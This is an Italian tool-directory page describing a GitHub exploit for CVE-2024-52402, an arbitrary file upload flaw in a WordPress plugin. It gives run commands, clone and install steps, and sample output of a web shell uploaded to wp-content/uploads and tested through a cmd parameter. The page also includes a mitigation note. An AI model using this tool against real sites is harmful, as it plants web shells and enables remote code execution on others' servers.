Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-52402 — Plugin WordPress Exclusive Content Password Protect <= 1.1.0 - vulnerabilità CSRF per il caricamento arbitrario di file | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-52402
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubnxploited/cve-2024-52402

CVE-2024-52402

Plugin WordPress Exclusive Content Password Protect <= 1.1.0 - vulnerabilità CSRF per il caricamento arbitrario di file

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚀 Exploit per CVE-2024-52402: Plugin WordPress Exclusive Content Password Protect <= 1.1.0

🛡️ Panoramica

Questo exploit prende di mira una vulnerabilità di Cross-Site Request Forgery (CSRF) nel plugin WordPress Exclusive Content Password Protect, nelle versioni fino alla 1.1.0 inclusa. Questa vulnerabilità consente a un attaccante di caricare una web shell sul server web, portando a una potenziale esecuzione di codice remoto.

📅 Dettagli

  • Pubblicato: 2024-11-19
  • ID CVE: CVE-2024-52402
  • Versione del plugin: Exclusive Content Password Protect <= 1.1.0
  • Gravità: CRITICA (CVSS 9.6)

⚙️ Utilizzo

Per sfruttare questa vulnerabilità, devi fornire l'URL del sito WordPress target, un nome utente WordPress valido e la password. Lo script di exploit accederà al sito WordPress e tenterà di caricare una web shell.

🔧 Comando

root@kitploit:~
python CVE-2024-52402.py -u <target> -un <username> -p <password>

🛠️ Opzioni

root@kitploit:~
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

🌟 Esempio

root@kitploit:~
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin

🚀 Esempio di output

root@kitploit:~
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami

📜 Descrizione

Questo script sfrutta la vulnerabilità CSRF nel plugin Exclusive Content Password Protect per caricare una Web Shell sul server WordPress. Tuttavia, non esegue direttamente un attacco CSRF; si concentra invece sullo sfruttamento della funzionalità di upload file del plugin per ottenere lo sfruttamento.

👨‍💻 Come eseguire lo script

  1. Clonare il repository

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52402.git
    cd CVE-2024-52402
    
  2. Installare i requisiti Assicurati di avere la libreria requests installata:

    root@kitploit:~
    pip install requests
    
  3. Eseguire lo script Usa il seguente comando per eseguire lo script:

    root@kitploit:~
    python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
    

🛡️ Mitigazione

Per mitigare questa vulnerabilità, aggiorna il plugin Exclusive Content Password Protect all'ultima versione in cui questo problema è stato risolto.

⚠️ Disclaimer

Questo script è destinato esclusivamente a scopi educativi. L'uso non autorizzato di questo script contro sistemi su cui non hai esplicito permesso di testare è illegale e non etico.

Exploit di: Nxploit, Khaled alenazi.

Scarica lo strumento